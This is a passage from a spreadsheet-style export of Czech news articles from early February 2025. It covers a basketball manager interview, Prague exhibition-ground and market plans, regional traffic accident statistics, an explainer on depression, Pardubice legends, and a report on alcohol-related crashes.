začátku ledna, u nás se příchod nového roku slavil pořádně od podlahy a následovala dlouhá cesta a povinnosti ve Slovinsku . Na tréninku jsem se jim tam vyvrátil. Basketbalistky slovenského Ružomberku (zleva Alena Kováčová , Iveta Bieliková a Martina Godályová) slaví v Brně prvenství v Eurolize. (1999) A basketbal jako takový jste prožíval jak? S velkými nervy. Doteď je při sportu mám, ani nevím proč. Tehdy to bylo doslova hrozné, ztratil jsem plno let života. Když jsme hráli finále Euroligy v Ružomberku , ve dvou prodlouženích s Bourges , chodil jsem kolem haly, nevěděl jsem, kam zalézt, nápor byl opravdu enormní. Asi i proto je dobře, že jsem s tím seknul. (úsměv) Při manuální práci se vám daří mít klidnou hlavu, nebo se místo starání o pasy hráček moříte s tím, abyste měl čistou pracovní blůzu a všechno nářadí? Tyhle starosti si domů nenosím. Jsem poměrně dobře organizovaný člověk, nezapomínám věci do práce, všechno si v hlavě rychle projdu a vím. Nestává se mi, že bych se na něčem zasekl. Ani vás místo výsledku zápasu nebo výkonu rozhodčích nerozčílí pokládání dlažby na parkovišti? Jediné, co mě dokáže naštvat, je vlastní práce. Když se mi něco nepodaří nebo jsem nepochopil, co se po mně přesně chtělo. Z toho jsem pak nervózní, abych něco z neznalosti neudělal špatně. Vždycky potřebuji přesné zadání, vše vysvětlit. Pak jsem v práci úplně v klidu. Bývalý basketbalový manažer Dušan Nižňanský. Před rokem 2000 byl u největšího rozmachu slovenského Ružomberku , po roce 2002 zažil úspěchy v Eurolize s brněnskými Žabinami. (leden 2025) Autor: Radim Strachoň, MAFRA Basketbalistky brněnských Žabin slaví jeden ze svých ligových titulů, dole první zprava manažer Dušan Nižňanský. Autor: archiv D. Nižňanského Bývalé basketbalistky brněnských Žabin při exhibičním utkání. První zprava je trenér Jan Bobrovský , třetí zprava manažer Dušan Nižňanský. Autor: archiv D. Nižňanského Basketbalistky slovenského Ružomberku (zleva Alena Kováčová , Iveta Bieliková a Martina Godályová) slaví v Brně prvenství v Eurolize. (1999) Autor: ČTK Autor: Jiří Punčochář Autor Jiří Punčochář</t>
  </si>
  <si>
    <t>1030000</t>
  </si>
  <si>
    <t>1010000</t>
  </si>
  <si>
    <t>20250201_11_3892208412_71f843bf15be249b7e5d.html</t>
  </si>
  <si>
    <t>71f843bf15be249b7e5d</t>
  </si>
  <si>
    <t>Výstaviště Praha, a.s., v roce 2025: pokračující rozvoj areálů Výstaviště i oslavy 130 let Holešovické tržnice</t>
  </si>
  <si>
    <t>Výstaviště Praha , a.s., v roce 2025: pokračující rozvoj areálů Výstaviště i oslavy 130 let Holešovické tržnice Podniky/Brandy/Projekty Společnost Výstaviště Praha, a.s. , která spravuje areály Výstaviště a Holešovické tržnice, má za sebou druhý rok hospodářského propojení obou areálů a stejně jako se loňský rok nesl ve znamení rozvoje, i ten letošní slibuje pokračující růst obou areálů. V roce 2025 se mohou návštěvníci těšit především, v případě Holešovické tržnice, na otevření budovy bývalé jateční burzy po náročné rekonstrukci, Haly 27 a 28 jako budoucích obchodních jednotek nebo na oslavy 130 let areálu v podobě gurmánsko-kulturního festivalu, jehož součástí budou koncerty, přednášky nebo gastroperformance BEEF. Na Výstavišti i v roce 2025 pokračuje rekonstrukce Průmyslového paláce, multimediální prostor Nová Spirála nabídne další bohatý program a chybět nebude ani Den hrdinů, akce, která vzdává hold IZS a která si letos připíše desátý jubilejní křížek. Na Výstavišti i v tržnici bude v roce 2025 nabito stovkami akcí, ať už vlastních nebo třetích stran, a nabídka bude opět pestrá pro všechny věkové kategorie. Výstaviště a tržnice v roce 2024 V rámci Výstaviště i Holešovické tržnice proběhlo v roce 2024 celkem 373 akcí, přičemž areál Výstaviště navštívilo 1,8 milionu návštěvníků. Korzy Holešovické tržnice prošlo 2,8 milionu návštěvníků. K hlavním událostem na Výstavišti patřilo v uplynulém roce otevření Nové Spirály po více než dvaceti letech, revitalizace zelených střech Křižíkových pavilonů, které nyní slouží jako zelené pobytové plochy, stejně jako pokračující rekonstrukce Průmyslového paláce, kde došlo mj. k návratu hodinové věže na střechu střední haly paláce, nebo rekonstrukce budovy Lapidária, která pokračuje také v roce letošním. V Holešovické tržnici pokračovala rekonstrukce nejhonosnější budovy v areálu, bývalé jateční burzy, jejíž dokončení je v plánu tento rok pro zahájení hostinské činnosti, došlo ke zprovoznění hodinového stroje na Vodárenské věži a velmi úspěšně proběhla putovní výstava Lovci znaků. Vedle toho se tržnice definitivně zařadila na pražskou gurmet mapu jako pevný bod pro všechny, kteří milují pop-up akce a objevování světových chutí nebo tradiční nákupy čerstvých potravin v Hale 22. Nechyběl ani celoroční provoz Food Truck Pointu a eventy jako Mexický svátek mrtvých či Vyshyvanka Day, které propojují kulturní zážitek s vůněmi mexické a ukrajinské kuchyně. „Shrnout uplynulý rok za oba areály do jednoho odstavce je víceméně nereálné, ale věřím, že nejen Pražané zaznamenali znovuotevření dnes multimediálního prostoru Nové Spirály na Výstavišti, což je skutečně velká událost, a já bych chtěl ještě jednou touto cestou poděkovat Magistrátu hl. m. Praha za tuto nemalou investici. Oba areály v loňském roce opět rostly, dokončili jsme zelené střechy Křižíkových pavilonů na Výstavišti, finalizujeme rekonstrukci budovy Burza v tržnici, kde jsme rovněž opravili řadu hal a dalších dílčích věcí po celém areálu, a zejména jsme opět návštěvníkům nabídli v obou areálech stovky ať už vlastních akcí či akcí třetích stran nejrůznějšího zaměření pro všechny věkové kategorie. A stejně tak nabitý rok máme před sebou, kdy se budeme třeba oddávat oslavám 130 let tržnice,“ komentuje rok 2024 a 2025 Tomáš Hübl, předseda představenstva Výstaviště Praha, a.s. K nejvýznamnějším akcím patřily v roce 2024: Na Výstavišti: Prague Bike Fest, otevření Nové Spirály (premiéry: Vzkříšení a Madisonské mosty), NeverMore 68 (ženy v disentu), Krampus Show, TEDx, módní přehlídka La Formela, Matějská pouť, Letní scéna Studio DVA, Azyl78, All American Fest, Dyzajn market, Legendy, Metronome Prague, Svět knihy Praha a další. V Holešovické tržnici: Pastrami a Pizza Pizza pop-up, Mexický svátek mrtvých, Vyshyvanka Day, Lovci znaků, #5PROSTOR, Adventní trhy s filmovými projekcemi Svařák &amp;amp; Film, komentované procházky pro starší a úkolové stezky pro nejmladší návštěvníky, Pražský festival piva , divadelní festival Za dveřmi, desátý ročník Mezinárodního festivalu ilustrace a komiksu LUSTR, MINT Market , dětský festival MINI, Prague Coffee Festival, Konference ETH Prague a další. „Za velký úspěch loňského roku považuji, že se nám podařilo potvrdit směr s tematicky laděnými gastro pop-upy, které nám chyběly na mapě pražských gastro akcí – Pastrami Pop-Up a Pizza! Pizza! Pop-Up vloni vyrostly jak nabídkou, tak návštěvností. I letos budeme postupně budovat stabilní nabídku akcí, které se konají od jara do Vánoc. Vedle toho ale areál oslaví 130 let od uvedení do provozu – a k tomu jsme přichystali program, jehož ústředním tématem bude dědictví někdejších městských jatek. Program se bude věnovat historii areálu, jak areál vypadal a fungoval dříve, ale především tématu jídla, protože lidská potřeba jíst a obstarávat si potravu je tím skutečným důvodem jeho vzniku. Vrcholem programu bude dvacetidenní festivalový pop-up v Hale 17, kde vznikne ve speciální scénografii kavárna, prostor pro koncerty, výstavu a nejrůznější akce, věnovaný všemu, co souvisí s tvorbou a konzumací lidské potravy. Vrcholem programu pak bude jedenáctichodová gastroperformance BEEF, která přináší v Česku zatím nebývalou kombinaci divadla, stand-upu a komplexního gastronomického zážitku,“ říká Michal Tošovský , programový ředitel Holešovické tržnice. Výstaviště a tržnice v roce 2025 Také v tomto roce bude na Výstavišti po celý rok na akce i další rozvoj nabito. Jako již tradičně započne sezonu symbolicky oblíbená Matějská pouť, která letos nabídne návštěvníkům legendární ocelovou horskou dráhu Cyklon, která na Výstavišti vozila děti i dospělé více než 40 let. S Matějskou poutí se probudí také park na Výstavišti a s ním všechny sportovní aktivity, od běhu, kol, koloběžek a bruslí po skate, jógu v přírodě, parkour, přírodní work-out či dětské venkovní prolézačky. Od jara budou rovněž otevřeny všechny kavárny. „Letošní rok nám přináší opět velkou porci akcí pro širokou veřejnost a všechny věkové kategorie, ráda bych však návštěvníky pozvala zejména na dva eventy, a to třetí ročník Prague Bike Fest, kdy jsme loni přivítali na sedm tisíc návštěvníků a letos máme v plánu atakovat hranici deseti tisíc návštěvníků a povýšit tak akci na největší cyklo festival v zemi. Vedle toho ale také srdečně zvu návštěvníky na desátý, tedy jubilejní ročník Dne hrdinů. V loňském roce byla akce z důvodu povodní zrušena, proto aktivity, které jsme chtěli představit v rámci zrušeného ročníku, přecházejí do roku 2025 a my se moc těšíme, že ukážeme třeba humanitární základnu v plné parádě a nabídneme další novinky jako podcast stage a mnoho dalšího,“ láká na Výstaviště Daniel Netušil, programový ředitel Výstaviště Praha . Nová Spirála uvítá zvučná jména Jednou z hlavních událostí roku 2024 bylo otevření Nové Spirály po dvaadvaceti letech a také v tomto roce bude tomuto multižánrovému prostoru věnována značná pozornost. Spirála slibuje nabitý a velice rozmanitý program, a to po celý rok. V současné chvíli pokračují reprízy multimediální show Vzkříšení i milostné romance Madisonských mostů. „V roce 2025 plánujeme velkou premiéru The Saturn Revue, retro-futuristickou hudební revue a varietní show, která divákům nabídne nezapomenutelný zážitek na světové úrovni. Pravidelně začne fungovat malý sál jako klubová scéna či prostor pro menší divadla a plánujeme řadu koncertů ve velkém sále, od vážné hudby, přes popovou, až po jazzovou. Zde bych rád zejména upozornil na české scéně unikátní vystoupení operního pěvce Pavla Černocha s hosty. Do toho spolupracujeme na akcích třetích stran, jako jsou koncerty, konference, předávání cen,“ přibližuje rok 2025 Jan Makalouš, ředitel Nové Spirály. Průmyslový palác – návrat vitráží z Nového Boru Rekonstrukce Průmyslového paláce zdárně pokračuje také v tomto roce. V únoru bude završen třetí rok od zahájení rekonstrukčních prací s tím, že k předání stavby by mělo dojít v červnu 2026. Na své místo se z novoborské sklárny Kolektiv Ateliers vrátí komplet 2256 metrů vitráží, jejichž renovace byla započata na podzim roku 2024. Levé křídlo se dočká nové střechy a oken, pokračují zde také práce na fasádě. Letošní rok jsou v plánu rozsáhlé práce v suterénu, kde proběhne kompletace strojoven – usazení vzduchotechnických jednotek, čerpadla pro sprinklery, tepelná čerpadla, chladicí jednotky, rozvaděče elektro a další. Na střední hale bude dokončena střecha a do konce roku bude finálně vyhotovena i nová podlaha. V pravém křídle pak bude pokračovat sanace ocelové konstrukce a rekonstrukce Smetanovy vestavby, zároveň zde bude vybudována hrubá podlaha. „V tuto chvíli již počítáme s přesunem významných akcí do Průmyslového paláce od roku 2027, a to zejména veletrh Svět knihy. Pevně ale věříme, že i akce, které byly nuceny z důvodu rekonstrukce paláce areál opustit, se ve větší míře navrátí s dokončením rekonstrukce v příštím roce. Celkově již z obchodního hlediska s palácem pracujeme a letos se chystáme prezentovat na IMEX Frankfurt, IBTM Barcelona, ale zvažujeme i IMEX America, kdy cítíme potřebu návratu na tento trh. Vedle toho se soustředíme na obchod v oblasti menších eventů a akcí, kdy prezentujeme třeba nákupčím v Londýne či Milanu. Mám-li však nalákat širokou veřejnost na konkrétní událost tohoto roku, určitě nepromeškejte koncert Marka Ztraceného ,“ shrnuje obchodní výhledy areálu Marie Štéglová, obchodní ředitelka Výstaviště Praha a dodává: „Samozřejmě nebudou ani v tomto roce chybět oblíbené akce jako Svět knihy, Metronome, hostování Studia Dva nebo Azylu78 a desítky dalších.“ V oblasti rozvojové je v plánu pro letošní rok vedle pokračující rekonstrukce Průmyslového paláce také pokračující práce na objektu Lapidária, dále rekonstrukce pavilonu J, kde sídlí Policie ČR, dojde však i k úpravám parkovacích ploch či údržbě veřejného osvětlení. V řešení je rovněž objekt Pyramidy, kde probíhají obchodní jednání o dalším využití budovy. Holešovická tržnice Holešovická tržnice započala svou obrodu před dvěma lety, přičemž v tomto roce dojde k otevření nejvýznamnější budovy bývalých jatek – Burzy. Jednou z dalších zásadních událostí v letošním roce bude rovněž uvolnění korz od stavebních dvorů, a to po dvou letech, kdy byla započata právě rekonstrukce Burzy. V hlavní roli pak budou po celý rok samozřejmě oslavy 130 let od zprovoznění areálu vedle pokračujících rekonstrukcí a revitalizací vybraných hal, cestních ploch či řešení infrastruktury. „Nedávno jsme na radě schválili strategickou koncepci rozvoje Holešovické tržnice do roku 2038. Areál je dlouhodobě podinvestován a potřebuje investice ve výši asi 5 miliard korun. Nicméně v tržnici postupně probíhají i dílčí úpravy některých hal a také modernizace technické infrastruktury. Hezkým dárkem ke 130. narozeninám tržnice bude letošní otevření zrekonstruované bývalé jateční burzy. Přibližně rok poté vstane z popela také Průmyslový palác na pražském Výstavišti. Jeho obnova po ničivém požáru v roce 2008 patří k nejnáročnějším a nejnákladnějším projektům pro Prahu . Po rekonstrukci Průmyslový palác nabídne jeden z největších krytých prostor pro kongresy a další akce ve střední Evropě ,“ říká radní pro majetek, transparentnost a legislativu Adam Zábranský . Tržnice slaví 130 let aneb jídlo všude kam se podíváš! Holešovická tržnice se v roce 2024 definitivně zařadila na pražskou gastro mapu nejen díky vlastním pop-up konceptům, které představují různé kuchyně světa v rámci jednodenních gurmet eventů nebo téměř celoročnímu provozu Food Truck Pointu, ale i díky již tradičním nákupům v Hale 22, kde najdou návštěvníci po celý rok zejména produkty od českých farmářů. Rok 2025 však slibuje další značný růst v oblasti gastronomie, a to nejen prostřednictvím zmíněné budovy Burza, jejíž rekonstrukce se chýlí ke konci, a kde již letos nabídne nový provozovatel Zátiší Group kvalitní občerstvení pro širokou veřejnost. Gastronomické zážitky v tržnici umocní v roce 2025 také oslavy 130 let areálu bývalých jatek, jejichž hlavní část se odehraje na jaře v Hale 17. „V Hale 17 vyroste v tržnici na tři týdny prostor s kavárnou, v níž bude čekat svět plný gastronomických specialit a program v podobě koncertů kapel jako WWW Neurobeat, Republic of Two nebo Ida the Young, přednášek, tematické Fuck Up Night či drobných performancí. Kompletní program bude zveřejněn a předprodej spuštěn v průběhu února,“ doplňuje Michal Tošovský . V prvním patře Haly 17 se pak příběh jídla a jeho historie, minulost Holešovické tržnice a úvahy o budoucnosti naší gastronomie propíšou do neopakovatelné fúze jídla a divadla pod názvem BEEF. „Přijměte pozvání do chrámu hodování, místa, kde se jídlo stává náboženstvím a zážitek vírou. Během pouze 15 vybraných večerů vás čeká jedinečné jedenáctichodové degustační menu, připravené týmem šéfkuchaře restaurace Mlýnec Ládi Vaníčka ze Zátiší Catering Group . Menu této výjimečné gastro performance je z 90 % vegetariánské, a pokud si přejete, můžete si při nákupu vstupenky zvolit zcela vegetariánskou variantu. Každý chod je uměleckým zážitkem spojujícím performance, vizuální show a stand-up, které se propojují v jedno nezapomenutelné menu, jež probudí všechny vaše smysly,“ představuje koncept BEEF jeho spoluautorka Veronika Svobodová, programová manažerka Holešovické tržnice. Burza se stane nejen gastronomickým, ale i kulturním centrem Holešovické tržnice. Cílem je oživit celý prostor a podpořit jeho přeměnu v centrum kultury, gastronomie a odpočinku, které nabídne kvalitní jídlo a autentickou atmosféru pro Pražany i turisty. „Zátiší Group se těší na to, že otevření Burzy bude dalším krokem k demokratizaci kvalitní gastronomie. Interiér Burzy bude kombinovat historické prvky budovy bývalé jateční burzy s moderním designem. Centrálním bodem celého prostoru se stane skleněný bar od renomovaného studia Lasvit, který podtrhne nejen estetičnost, ale i inovativní přístup k celkovému pojetí restaurace. Nábytek bude laděn v kontrastu mezi historickým a současným, což propojí minulost s přítomností,“ komentuje David Tomašovych, Catering Finance &amp;amp; Business Development Director, Zátiší Group . Nově se mohou návštěvníci těšit také na skupinu Ambiente, která představí hned tři lahodné koncepty. Dva oblíbené podniky Ambiente – řeznictví Naše maso a cukrárna Myšák, a také zcela nový koncept slovenské restaurace. Ambiente vytvoří v tržnici pro návštěvníky místo, které bude žít od rána do noci. „Holešovický dvorek propojí všechny tři koncepty – ráno si tu budete moct vychutnat snídani u Myšáka s výběrovou kávou a tradičními českými zákusky, k obědu zamířit na výtečné steaky či burgery z Našeho masa nebo na slovenské speciality a srdečnou pohostinnost v restauraci vedené šéfkuchařem Tomášem Valkovičem. Večer pak bude patřit vínu, fine diningu a neformálnímu posezení pod širým nebem,“ komentuje Šárka Hamanová, PR manažerka Ambiente. Autor: 01.02.2025 || 01.02.2025 | Podniky/Brandy/Projekty</t>
  </si>
  <si>
    <t>20250201_110_3890110449_2625e49f17147fec2671.html</t>
  </si>
  <si>
    <t>2625e49f17147fec2671</t>
  </si>
  <si>
    <t>V lednu zemřel na silnicích v Moravskoslezském kraji jeden člověk</t>
  </si>
  <si>
    <t>V lednu zemřel na silnicích v Moravskoslezském kraji jeden člověk Letos jedna tragická nehoda oproti loňským třem. Leden na silnicích v Moravskoslezském kraji zaznamenal bezmála 1000 dopravních nehod. Dopravní policie Moravskoslezského kraje eviduje dle předběžných statistik v lednu letošního roku 932 nehod. Zemřel při nich jeden člověk. MOHLO BY VÁS TAKÉ ZAJÍMAT: Střet automobilu s chodcem v Ostravě - Porubě . V případu figuruje i alkohol Nehoda u McDonalds v Ostravě - Porubě . | Video: Deník/Kateřina Součková „Smrtelné následky měla nehoda, která se stala 20. ledna v Třinci na Frýdecko-Místecku. Osobní auto tam srazilo chodce, jenž zřejmě přecházel vozovku mimo přechod a utrpěl zranění, kterým později podlehl,“ řekla ČTK mluvčí policie Pavla Jiroušková. Celkem se během ledna stalo v kraji 932 nehod, což je o 23 méně než loni. Při nehodách bylo sedm lidí těžce zraněno, 130 lehce. Celková škoda byla vyčíslena na 74 milionu korun. Nejčastější příčinou nehod bylo nepřizpůsobení jízdy okolnostem, druhou nejčastější příčinou byla nepřiměřená rychlost. Nejvíce nehod se stalo pátek 24. ledna, celkem 44. Bruntál : 70 nehod (0 mrtvých) Frýdek-Místek : 162 nehod (1 mrtvý) Karviná : 134 nehod (0 mrtvých) Nový Jičín : 132 nehod (0 mrtvých) Opava : 134 nehod (0 mrtvých) Ostrava -město: 271 nehod (0 mrtvých) DO Mankovice: 13 nehod (0 mrtvých) DO Ostrava : 15 nehod (0 mrtvých) Autor: ČTK, Zdeněk Janiurek Autoři ČTK Zdeněk Janiurek Rubrika transition_slide Ostravsko</t>
  </si>
  <si>
    <t>33990</t>
  </si>
  <si>
    <t>36840</t>
  </si>
  <si>
    <t>20250201_111_3890627505_3fdad4fb081603651a18.html</t>
  </si>
  <si>
    <t>3fdad4fb081603651a18</t>
  </si>
  <si>
    <t>Depresí častěji trpí ženy, u mužů mívá závažnější průběh. Onemocnět mohou i malé děti</t>
  </si>
  <si>
    <t>Depresí častěji trpí ženy, u mužů mívá závažnější průběh. Onemocnět mohou i malé děti Třetí pondělí v lednu je známé také jako Blue Monday, údajně nejdepresivnější den v roce. Letos připadá na 20. ledna. Přestože se jedná o smyšlený a vědecky nijak nepodložený marketingový koncept, poukazuje na to, co mnoho lidí první měsíc v roce zažívá – únavu, smutek a pokles energie, což vede k depresivním náladám. „Skutečná“ deprese ale není jen otázkou jednoho dne. „Deprese je závažné onemocnění, které výrazně ovlivňuje denní činnosti člověka. Projevuje se nejen pokleslou náladou, ale také ztrátou radosti ze života, sníženou energií a motivací, pocitem prázdnoty a beznaděje nebo poruchou koncentrace a paměti,“ vysvětluje MUDr. Kateřina Šédová, zakladatelka neziskové organizace Loono, která se depresí a dalšími duševními problémy zabývá v rámci své kampaně Dobré nitro. Mnozí lidé s depresí mají problém ráno vůbec vstát z postele. I běžné ranní činnosti jako sprcha nebo snídaně pro ně mohou být obtížné. Mohou se cítit vyčerpaní hned po probuzení, a to i pokud spali dostatečně dlouho. Soustředit se na pracovní či jiné úkoly pro ně bývá velmi obtížné, stejně tak společenský kontakt. Zažívat mohou pocity izolace a nepochopení, a to i mezi blízkými lidmi. Vyskytují se u nich výčitky a pocity viny, ztrácí sebedůvěru. U těžkých forem se mohou objevit i bludy a halucinace. A přidat se mohou také fyzické obtíže, jako je bolest hlavy, problémy s trávením, nespavost, snížení libida i chuti k jídlu. Mnozí lidé s depresí ztrácejí zájem o věci, které jim dříve dělali radost, například koníčky, setkávání s přáteli nebo sport. I když se stále účastní běžných aktivit, nemají z nich žádnou radost a jejich výkon může být ovlivněn nízkou motivací. „Depresi je potřeba odlišit od smutku. Při depresi trvá chorobná nálada alespoň 14 dní a 70 % pacientů při ní má i myšlenky na sebevraždu,“ říká Kateřina Šédová. Roli hrají genetika i vlivy prostředí Deprese je velmi častým onemocněním, kterým podle Světové zdravotnické organizace na celém světě trpí více než 250 milionů lidí. Častější je u žen, u mužů ale mívá obvykle závažnější průběh. Postihnout může člověka v jakémkoliv věku, a to včetně dětí. U nich má deprese obvykle tělesné projevy, jako je například bolest bříška. Riziko vzniku deprese ovlivňuje genetika. Pokud mají lidé někoho s depresí v rodině, mají riziko 3x vyšší, že propukne i u nich. Mezi rizikové faktory patří také závažné životní situace, jako je například ztráta blízkého člověka či zaměstnání, rozvod nebo fyzické či sexuální obtěžování. Roli hrají také sociální vlivy, rozvoji deprese může napomoci nedostatečná opora v rodině či přátelích, stejně tak může působit i diskriminace jakéhokoliv druhu. Patrná je i souvislost se socio-ekonomickými faktory, kdy depresí častěji trpí lidé s nižšími příjmy, nižším vzděláním či dlouhodobě nezaměstnaní. Velký vliv může mít i dlouhodobý stres, užívání návykových látek, nedostatek světla zejména v zimních měsících nebo poruchy spánku. Deprese se může objevit také po úrazech či při chronických nemocech, nejčastěji při onemocněních štítné žlázy či mozku, astmatu, cukrovce nebo obezitě. Jak depresi předcházet? Základem je dostatek spánku, který by měl trvat alespoň 7–9 hodin. Pravidelný pohyb přispívá nejen ke zdravým svalům a kostem, ale má pozitivní vliv také na duševní pohodu, jelikož zvyšuje sebevědomí a snižuje stres i úzkost. A klíčová je také zdravá a vyvážená strava. Vzhledem k množství povinností, které jsou v dnešní době na člověka kladeny, je velmi důležité také efektivní hospodaření s časem. Do běžného dne je dobré vedle práce či studia zařadit také dostatek odpočinku, ať už pasivního (sledování filmů, poslouchání hudby) nebo aktivního (procházka, jóga). Během relaxace do mozku přichází snížené množství impulzů, čímž se z organismu odstraňuje svalové a duševní napětí, což vede k jeho regeneraci a zotavení. Zapomínat bychom neměli ani na různá relaxační cvičení, která pomáhají k zvládání stresu a podporují duševní vyrovnanost Pokud na sobě nebo na blízkém člověku zpozorujete příznaky deprese, navštivte praktického lékaře, který doporučí další kroky, včetně psychiatrického vyšetření. Navštívit můžete také přímo psychiatra. Pokud psychiatr diagnostikuje depresi, navrhne léčbu, která se může lišit podle konkrétního případu. Klíčová je změna životního stylu – pravidelný pohyb, zdravá a vyvážená strava, omezení alkoholu a dalších škodlivých návyků – ale také pravidelné užívání léků, které pomáhají zmírnit příznaky deprese až u 80 % pacientů. Léčbu je vhodné doplnit také dlouhodobější psychoterapií. „Jestliže máte podezření, že byste mohli trpět depresí nebo jiným duševním onemocněním, nestyďte se, vyhledejte pomoc odborníka a povězte o svých problémech blízkým. Nezůstávejte na to sami,“ dodává Kateřina Šédová. Autor: Autor: Isokratés || admin</t>
  </si>
  <si>
    <t>13</t>
  </si>
  <si>
    <t>20250201_112_3889994962_4912d2dc0c7035eff73e.html</t>
  </si>
  <si>
    <t>4912d2dc0c7035eff73e</t>
  </si>
  <si>
    <t>Pověsti z Pardubicka: Zaplatí návštěvník hrobky Vojtěcha z Pernštejna za svoji opovážlivost životem?</t>
  </si>
  <si>
    <t>Pověsti z Pardubicka: Zaplatí návštěvník hrobky Vojtěcha z Pernštejna za svoji opovážlivost životem? Helena Stejskalová 1.2.2025 Pardubicko je nabité pověstmi. Jmenujme namátkou legendy O opatovickém pokladu nebo O smrti kostelníka vztahující se ke významné osobnosti svého času jednoho z nejvýznamnějších šlechtických rodů Království českého. Podle současného historika Františka Šebka nejstarší pověst z Pardubicka pochází z 2. poloviny 12. století a pojednává o vzniku Opatovického kláštera. Král Vratislav se procházel po břehu řeky. Vstoupil do lodi, kde usnul. Zdál se mu sen, že má vstát a hledat Bohu milé místo a na něm založit opatství. Faktem je, že první zmínka o klášteře pochází z roku 1086 – Vratislav II . (kolem 1033‒1092) se stává prvním českým králem roku 1085. Zdejší mniši údajně nashromáždili ohromné bohatství. Zatoužil je spatřit i Karel IV. Opat ho provedl podzemím, kde uviděl spoustu stříbra a zlata. Na památku dostal prsten s diamantem. Vojtěch z Pernštejna zemřel nečekaně. FOTO: Nadkachna/Creative Commons/CC BY 3.0 Poklad ukořistili husité Další pověst vypráví, že si mniši během husitských válek bohatství schovali v sudech a převezli ho k pánovi hradu na Kunětické hoře . Řekli mu ale, že je uvnitř víno . Pán ho zatoužil ochutnat. Když zjistil, co je uvnitř, přikázal sloužícím: „Vezměte jim poklad a vlijte do sudů víno .“ Jakmile mniši přebírali svůj poklad a zjistili, že je pán podfoukl, chtěli cennosti zpátky. Kunětický pán jim ale nedal nic – i oni ho podfoukli. Ve skutečnosti klášter vyplenil husitský hejtman Diviš Bořek z Miletínka (1360/1370‒1438). Kronikář Václav Hájek z Libočan (†1553) tvrdí, že šlo o nejbohatší klášter v Čechách . Část pokladu se má skrývat na Kunětické hoře , hledači ale zatím nenašli nic. Takhle vypadal Opatovický klášter v roce 1602. FOTO: Bartosz Paprocki/Creative Commons/CC BY-SA 4.0 Pomohlo léčivé ovoce Hrobka Vojtěcha z Pernštejna (1490‒1534) v kostele sv. Bartoloměje připomíná jeho příběh. Zemřel nečekaně a jeho smrt byla spojována s pomstou „české čachtické paní“ Kateřiny z Komárova, kterou jako zemský sudí odsoudil za týrání. Říká se, že za vstup hrobky do ní platí nezvaný návštěvník svým životem. Ovšem zdejší kostelník si dodal odvahy. „To přece nemůže být pravda. Zkusím se tam podívat. Kdo ví, co tam najdu,“ řekl si. S pomocí kolegy odsunul náhrobní kámen. Chystal se vlézt dovnitř, ale z nitra se ozval podivný záhrobní hlas. „Sejdeme se do roka a do dne!“ A skutečně, kostelník do roka zemřel. Co na vyprávění říkají historikové? Podle Šebka jde o nadsázku. K Vojtěchovi se vztahuje i jiná pověst, která pojednává o léčivém ovoci. Když byl tento syn Viléma z Pernštejna ještě malým chlapcem, onemocněl. Vyléčily ho prý zázračné třešně rostoucí pod Kunětickou horou . Děti, které se pod stromem procházely, vyzvalo zjevení v podobě hezkého mládence, aby ovoce donesly na zámek. Zdroje informací: MAŠEK, Petr, Prastaré pověsti české, Příbram : Pistorius &amp;amp; Olšanská , 2010, ISBN 978-80-87053-52-2 ŠEBEK, František, Dějiny Pardubic , Městský národní výbor ( Pardubice ) 1990, ISBN: 80-900069-1-4 https://ct24.ceskatelevize.cz/clanek/archiv/pernstejnove-289095 https://www.ziveprenosyzdarma.cz/pardubice-jsou-skutecnym-mestem-sportu?id=Ostatky_patrona_mesta_Vojtecha_z_Pernstejna_zustanou_i_nadale_neprozkoumany Foto: Creative Commons, Úvodní fotografie: Josef Hron/Creative Commons/Public domain Právě v prodeji Autor: Helena Stejskalová Autor person Helena Stejskalová</t>
  </si>
  <si>
    <t>20250201_113_3890066146_a165db715c4714d82081.html</t>
  </si>
  <si>
    <t>a165db715c4714d82081</t>
  </si>
  <si>
    <t>Dopravní podnět ke kampani Suchej únor: bouraček s alkoholem přibylo</t>
  </si>
  <si>
    <t>Dopravní podnět ke kampani Suchej únor: bouraček s alkoholem přibylo Pozitivní dopad nejen na zdraví, ale i na bezpečnost na silnicích může mít Suchej únor – tradiční kampaň vyzývající k měsíční abstinenci. Náměstek ředitele středočeské policie René Peták upozorňuje na nárůst počtu dopravních nehod pod vlivem alkoholu . Loni policisté ve Středočeském kraji zaznamenali 657 nehod s alkoholem , což představuje 5,6procentní nárůst oproti předchozímu roku. Varující je, že u 513 viníků havárií naměřili více než jedno promile (což je hranice odlišující přestupek od trestného činu). O tradiční kampani Suchej únor , která konzumenty vybízí k tomu, aby se po dobu jednoho měsíce (alespoň toho, který je z celého roku nejkratší) dokázali obejít bez alkoholu , se náměstek ředitele středočeské policie René Peták při hodnocení loňské dopravní nehodovosti ani nezmínil. Nicméně z jeho slov vyplynulo, že pokud pokud se do ní řidiči zapojí, stejně jako cyklisté a chodci, jenom jim to prospěje. A nejen jejich ledvinám, játrům, cévám či mozku, když se v souvislosti se Suchým únorem zdůrazňují hlavně zdravotní výhody. Peták totiž připomněl, že loni ve středních Čechách v rámci meziročního srovnání přibylo evidovaných dopravních nehod s vlivem alkoholu . Nehody Ve statistice 16 343 středočeských bouraček za rok 2024 figuruje těch s alkoholem 657. Proti předchozímu roku, kdy jich bylo 622, to představuje nárůst o 5,6 procenta. Z nich 72 zavinili cyklisté pod vlivem alkoholu – a šest chodci. Na dálnicích však poté, co si přihnuli něčeho ostřejšího, v meziročním srovnání bouralo méně lidí. V přehledech za střední Čechy , kde se nachází devět dálnic o celkové délce 367 kilometrů představujících téměř 30 procent celkové dálniční sítě v České republice , figuruje za loňský rok 22 případů – což ve srovnání s 31 z roku 2023 policisté vyčíslili na 29procentní pokles. „Zarážejících je 513 případů s alkoholem u viníka nad jedno promile, byť vidíme pokles o 29 případů,“ okomentoval Peták přehled středočeských nehod pod vlivem návykových látek. Za loňský rok v něm alkohol nějakým způsobem figuruje celkem u 691 bouračky. Vedle zmiňovaných 513 viníků, kteří měli upito důkladněji, šlo o 113 s hladinou alkoholu mezi 0,25 a jedním promile a dalších 31 s naměřenou úrovní do 0,24 promile. To často nejsou vědomí „hříšníci“, ale jde o případy zbytkového alkoholu po „včerejším“ popíjení, který leckteré řidiče zaskočí; mají za to, že poté, co se prospali, musí být dávno „čistí“. Nejsou – a neobstojí výmluva, že v řadě zemí je taková hladinka při řízení legální. Dalších 34 případů připadá na viníky nehod, kteří se odmítli podrobit dechové zkoušce i odběru krve. Berounsko Kombinaci alkoholu a drog současně středočeští policisté zjistili při vyšetřování 13 nehod. Drogy samotné policisté spojují se 74 z nehod, jež loni ve středních Čechách vyšetřovali. Přímo potvrzené je mají v 61 případu – a rovněž u nealkoholových 